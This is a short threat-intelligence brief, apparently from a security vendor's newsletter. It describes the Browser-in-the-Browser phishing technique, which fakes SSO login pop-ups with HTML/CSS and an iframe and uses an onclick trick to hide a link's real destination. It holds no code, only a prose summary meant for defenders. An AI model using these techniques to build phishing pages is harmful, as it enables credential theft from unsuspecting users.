2022-03-29

New Attack Browser-in-the Browser (BITB)

Level: 
Strategic
  |  Source: 
mrd0x
Share:

New Attack Browser-in-the Browser (BITB)

Industry: N/A | Level: Strategic | Source: mrd0x

A security researcher under the handle "mr.d0x," has been identified in a new Browser-in-the Browser (BITB) attack, simulating a windows browser of a spoofed domain, resulting in an effective phishing attack. The researcher's initial hypothesis was to explore if there's a way to "make the 'Check the URL' advice less reliable?" mr.d0x, was able to prove the hypothesis correctly by abusing authentication pop-up windows provided by services such as Google, Microsoft, Apple and others for Single-Sign-On (SSO). The BITB attack replicates the authentication process with an illegitimate duplicate authentication window utilizing HTML and CSS code to create the fabricated browser window, "replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and its basically indistinguishable." The attack also accounts for the inspection of hovering a URL through JavaScript as detailed "If an onclick event that returns false is added, then hovering over the link will continue to show the website in the href attribute but when the link is clicked then the href attribute is ignored."

Get trending threats published weekly by the Anvilogic team.

Sign Up Now